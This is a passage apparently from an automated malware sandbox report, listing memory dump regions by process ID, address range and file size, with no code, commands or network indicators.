                                                                                                                                                                      • memory/4724-380-0x0000000000400000-0x00000000008F3000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        4.9MB

                                                                                                                                                                      • memory/4724-376-0x00000000009B0000-0x0000000000AFA000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        1.3MB

                                                                                                                                                                      • memory/4760-232-0x0000000000000000-mapping.dmp
                                                                                                                                                                      • memory/4804-410-0x0000000000000000-mapping.dmp
                                                                                                                                                                      • memory/4860-236-0x0000000000000000-mapping.dmp
                                                                                                                                                                      • memory/4868-367-0x0000000000400000-0x0000000002C8E000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        40.6MB

                                                                                                                                                                      • memory/4868-369-0x0000000004B90000-0x0000000004B91000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/4868-372-0x0000000004B92000-0x0000000004B93000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/4868-361-0x00000000001C0000-0x00000000001EF000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        188KB

                                                                                                                                                                      • memory/4868-373-0x0000000004B93000-0x0000000004B94000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/4868-384-0x0000000004B94000-0x0000000004B96000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        8KB

                                                                                                                                                                      • memory/4868-235-0x0000000000000000-mapping.dmp
                                                                                                                                                                      • memory/4884-237-0x0000000000000000-mapping.dmp
                                                                                                                                                                      • memory/4884-268-0x0000000005CB0000-0x0000000005CB1000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/4884-263-0x0000000000EF0000-0x0000000000EF1000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/4892-363-0x0000000000400000-0x00000000008AA000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        4.7MB

                                                                                                                                                                      • memory/4892-240-0x0000000000000000-mapping.dmp
                                                                                                                                                                      • memory/4892-362-0x00000000001C0000-0x00000000001EF000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        188KB

                                                                                                                                                                      • memory/4904-385-0x0000000002E00000-0x0000000002F4A000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        1.3MB

                                                                                                                                                                      • memory/4904-238-0x0000000000000000-mapping.dmp
                                                                                                                                                                      • memory/4904-396-0x0000000000400000-0x0000000002CB3000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        40.7MB

                                                                                                                                                                      • memory/4916-321-0x0000000005E90000-0x0000000005E91000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/4916-319-0x0000000006460000-0x0000000006461000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/4916-313-0x0000000000E90000-0x0000000000E91000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/4916-295-0x0000000077860000-0x00000000779EE000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        1.6MB

                                                                                                                                                                      • memory/4916-337-0x0000000006070000-0x0000000006071000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/4916-320-0x0000000005E20000-0x0000000005E21000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/4916-327-0x0000000005ED0000-0x0000000005ED1000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/4916-328-0x0000000005E40000-0x0000000005E41000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/4916-239-0x0000000000000000-mapping.dmp
                                                                                                                                                                      • memory/4936-241-0x0000000000000000-mapping.dmp
                                                                                                                                                                      • memory/4996-416-0x0000000000000000-mapping.dmp
                                                                                                                                                                      • memory/5336-472-0x0000000000000000-mapping.dmp
                                                                                                                                                                      • memory/5396-475-0x0000000000000000-mapping.dmp
                                                                                                                                                                      • memory/5436-529-0x0000000000000000-mapping.dmp
                                                                                                                                                                      • memory/5444-530-0x0000000000000000-mapping.dmp
                                                                                                                                                                      • memory/5728-486-0x0000000000000000-mapping.dmp
                                                                                                                                                                      • memory/5776-489-0x0000000000000000-mapping.dmp
                                                                                                                                                                      • memory/5808-491-0x0000000000000000-mapping.dmp
                                                                                                                                                                      • memory/5840-492-0x0000000000000000-mapping.dmp
                                                                                                                                                                      • memory/6088-471-0x0000000000000000-mapping.dmp